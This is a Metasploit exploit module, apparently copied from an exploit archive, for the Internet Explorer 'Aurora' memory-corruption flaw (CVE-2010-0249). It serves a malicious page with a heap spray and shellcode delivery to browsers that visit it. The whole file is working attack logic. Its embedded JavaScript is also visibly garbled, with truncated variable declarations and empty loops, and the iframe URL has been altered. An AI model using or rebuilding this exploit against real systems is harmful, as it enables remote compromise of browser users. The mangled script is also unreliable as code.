require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'Internet Explorer "Aurora" Memory Corruption',
'Description'=> %q{
This module exploits a memory corruption flaw in Internet Explorer. This
flaw was found in the wild and was a key component of the "Operation Aurora"
attacks that lead to the compromise of a number of high profile companies. The
exploit code is a direct port of the public sample published to the Wepawet
malware analysis site. The technique used by this module is currently identical
to the public sample, as such, only Internet Explorer 6 can be reliably exploited.
},
'License'=> MSF_LICENSE,
'Author' =>
[
'unknown',
'hdm'
],
'Version'=> '$Revision: 9787 $',
'References' =>
[
['MSB', 'MS10-002'],
['CVE', '2010-0249'],
['OSVDB', '61697'],
['URL', 'http://www.microsoft.com/technet/security/advisory/979352.mspx'],
['URL', 'http://wepawet.iseclab.org/view.php?hash=1aea206aa64ebeabb07237f1e2230d0f&type=js']
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload'=>
{
'Space'=> 1000,
'BadChars' => "\x00",
'Compat' =>
{
'ConnectionType' => '-find',
},
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets'=>
[
[ 'Automatic', { }],
],
'DisclosureDate' => 'Jan 14 2009',
'DefaultTarget'=> 0))
@javascript_encode_key = rand_text_alpha(rand(10) + 10)
end
def on_request_uri(cli, request)
if (request.uri.match(/\.gif/i))
data = "R0lGODlhAQABAIAAAAAAAAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==".unpack("m*")[0]
send_response(cli, data, { 'Content-Type' => 'image/gif' })
return
end
if (!request.uri.match(/\?\w+/))
send_local_redirect(cli, "?#{@javascript_encode_key}")
return
end
var_boom = rand_text_alpha(rand(100) + 1)
var_element= rand_text_alpha(rand(100) + 1)
var_event= rand_text_alpha(rand(100) + 1)
var_loaded = rand_text_alpha(rand(100) + 1)
var_loaded_arg = rand_text_alpha(rand(100) + 1)
var_memory = rand_text_alpha(rand(100) + 1)
var_spray= rand_text_alpha(rand(100) + 1)
var_i= rand_text_alpha(rand(100) + 1)
var_el_array = rand_text_alpha(rand(100) + 1)
bleh = rand_text_alpha(3);
var_grab_mem = rand_text_alpha(rand(100) + 1)
var_unescape = rand_text_alpha(rand(100) + 1)
var_shellcode= rand_text_alpha(rand(100) + 1)
var_span_id= rand_text_alpha(rand(100) + 1)
var_start= rand_text_alpha(rand(100) + 1)
rand_html= rand_text_english(rand(400) + 500)
js = %Q|var
var
for (i = 0; i < 1300; i++)
{
}
var
var
var
function
{
var
var
do {
for (
}
function
{
document.getElementById("#{var_span_id}").innerHTML = "";
window.setInterval(
}
function
{
p = "\\u0c0f\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d";
for (i = 0; i <
{
}
var t =
}
|
js_encoded = encrypt_js(js, @javascript_encode_key)
html = %Q|<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN">
<html>
<head>
<script>
</script>
</head>
<body>
<span id="#{var_span_id}"><iframe src="https://www.exploit-db.com/exploits/16599/#{get_resource}#{var_start}.gif" onload="#{var_loaded}(event)" /></span></body></html>
</body>
</html>|
print_status("Sending #{self.name} to client #{cli.peerhost}")
send_response(cli, html, { 'Content-Type' => 'text/html', 'Pragma' => 'no-cache' })
handler(cli)
end
end